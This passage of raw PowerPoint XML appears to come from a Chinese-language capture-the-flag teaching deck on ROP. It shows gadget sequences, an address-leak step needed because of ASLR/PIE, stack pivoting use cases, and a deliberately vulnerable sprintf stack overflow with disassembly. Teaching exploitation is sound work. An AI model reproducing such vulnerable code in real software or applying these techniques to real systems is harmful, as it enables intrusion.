              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721" name="Shape 1721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="2544967"/>
            <a:ext cx="6415600" cy="6084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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>write(char *path, char *argv[], char *envp[]);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1722" name="Shape 1722"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1710" idx="0"/>
            <a:endCxn id="1721" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3591400" y="3153567"/>
            <a:ext cx="0" cy="1340000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1723" name="Shape 1723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015451" y="2143100"/>
            <a:ext cx="373200" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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24" name="Shape 1724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015433" y="4129767"/>
            <a:ext cx="373200" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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25" name="Shape 1725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10384400" y="3525767"/>
            <a:ext cx="1424000" cy="13964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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop esi </a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop edi</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1726" name="Shape 1726"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1714" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9700100" y="3258767"/>
            <a:ext cx="684400" cy="965200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1727" name="Shape 1727"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1719" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="9700100" y="4223967"/>
            <a:ext cx="684400" cy="1082800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832C4A67-68CA-4C55-919D-BA2710179887}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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79275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DA4D1F7-4598-4FB7-8B43-6CCB192628D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347174" y="2725805"/>
            <a:ext cx="7497651"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到目前为止我们只接触了内存空间分布已知的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但在绝大部分赛题中，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保护的开启，在发送攻击载荷（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）之前，往往需要我们先泄露内存分布信息，接下来来看一道题目。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D411DE94-44FB-4AE6-AFAF-CD37A028E972}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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8025714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731"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1732" name="Shape 1732"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="869950"/>
            <a:ext cx="1419225" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1733" name="Shape 1733"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="5100638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Definition</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改变 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>esp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈溢出长度不足以使用直接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈溢出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会出现空字符截断，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址含有空字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在泄露地址信息后需要新的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1734" name="Shape 1734"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418200" y="4591900"/>
            <a:ext cx="5237600" cy="21140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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void stack_overflow(char *user) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sprintf(dst, "%s", user);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  x64 assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x406113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>:	55         push   %rbp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x406114</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>:	41 89 d4   mov    %edx,%r12d</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1735" name="Shape 1735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814233" y="4661033"/>
            <a:ext cx="4647200" cy="19064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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void stack_overflow(char *user) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	 if (strlen(user) &gt; 536)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585" defTabSz="1219170">
              <a:buClr>
